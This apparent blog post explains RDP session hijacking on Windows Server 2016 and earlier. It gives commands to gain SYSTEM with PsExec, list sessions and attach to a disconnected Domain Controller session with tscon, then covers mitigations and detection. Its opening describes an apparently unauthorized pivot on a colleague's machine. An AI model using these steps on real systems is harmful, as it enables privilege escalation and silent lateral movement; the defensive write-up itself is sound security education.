I was poking around on a routine scanâpurely for educational reasons đâwhen one IT stafferâs workstation practically invited me in.
A quick credential dump landed me local-admin, and there they were: six RDP sessions quietly ticking away because he never hits Sign out.
This âpivotâ user had connections to half the companyâs servers, so one tscon dropped me straight onto the Domain Controller.
All that risk, born from a single habit: closing the window instead of logging off.
Before we dive into the technical walkthrough, letâs recap why a dangling RDP session is even a thing
1. Background
Remote Desktop Protocol (RDP) spawns a user session on the target server.
If you log off, that session is destroyed.
If you merely close the RDP client, the session flips to Disconnected (Disc
) and sits in RAMâprograms keep running, credentials stay cached.
On Windows Server 2016 and earlier, tscon.exe
allows a process running as NTÂ AUTHORITY\SYSTEM to attach to any live session without knowing its password.
2. Lab Walkâthrough: Hijacking a Disconnected Session
2.1 â Enumerate & understand your current role
2.2 â Elevate to SYSTEM
# run an elevated cmd *as Administrator*
C:\tools\PsExec64.exe -s cmd.exe
-s
⸠launches the new cmd.exe
as SYSTEM.
2.3 â List RDP sessions
C:\> query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>administrator rdp-tcp#6 2 Active . 04/01/2022 04:09
DC 3 Disc . 04/06/2022 06:51
-
administrator
(you) is Active on session 2. - Session 3 is in Disc stateâperfect target.
2.4 â Steal Xâs Session into the DC
tscon 3 /dest:rdp-tcp#6
-
3
⸠the ID of Xâs session.
-
/dest:rdp-tcp#41
⸠your transport channel (seeSESSIONNAME
).
The RDP window instantly flips to Domain Controllerâs desktop, programs and allâno password prompt.
But on the bright side - they had a virtually uncrackable DC password.
3. Why This Is Dangerous
Risk | Impact |
---|---|
Privilege escalation | Hijacker inherits the victimâs rightsâoften Domain Admin. |
Silent lateral movement | No new logon events; looks like the legit user is still logged in. |
Data exposure | Open Outlook, KeePass, RDP filesâall ready for the taking. |
Operational disruption | Hijacker can run ransomware as the victim, masking attribution. |
4. Mitigations & Best Practices
- Always *Log offâteach admins to hit **Start â Sign out*.
-
Idle Session Limits
GPO:
Computer Config â Policies â Admin Templates â Windows Components â Remote Desktop Services â Session Time Limits
. Set âEnd a disconnected sessionâ to e.g. 15Â minutes. -
Deny
tscon
Hijack Server 2019+ prompts for the userâs password when attaching to another session. - Restrict SYSTEM Escalation Block or alert on PsExec/WMI with Defender ASR rule 56. Deploy AppLocker / WDAC to deny unsigned admin tools.
-
Monitor Event 7045 & 4778
Detect rogue service installs (
psexesvc
) and unexpected session reâconnections. - MFA for Admin RDP Even if a token is hijacked, MFA blocks fresh privileged logons.
5. Server 2019 and Later
Server 2019/2022 changed tscon
behaviourâSYSTEM can no longer attach to another userâs session without supplying that userâs credentials.
Still enforce logâoff discipline: the session keeps consuming RAM/CPU and may be exposed by future privilegeâescalation exploits.
6. Key Takeâaways
- Disconnect â  Log offâyour session remains a loaded gun on the server.
- Attackers with SYSTEM can pull the trigger in one line of PowerShell or
tscon
. - Good hygiene (log off), sensible timeouts, and modern hardening (ASR, WDAC) shut this door.
Stay safe, and make âSignâŻoutâ your new muscle memory! đĄď¸
References
-
Microsoft Docs âÂ
tscon
command - Sysinternals PsExec
- [Mitre ATT&CK â T1563.002: Remote Services > RDP Hijacking](https://attack.mitre.org/techniques/T1563/002
*And as always, all of this was done safely in a lab environment. *
Top comments (0)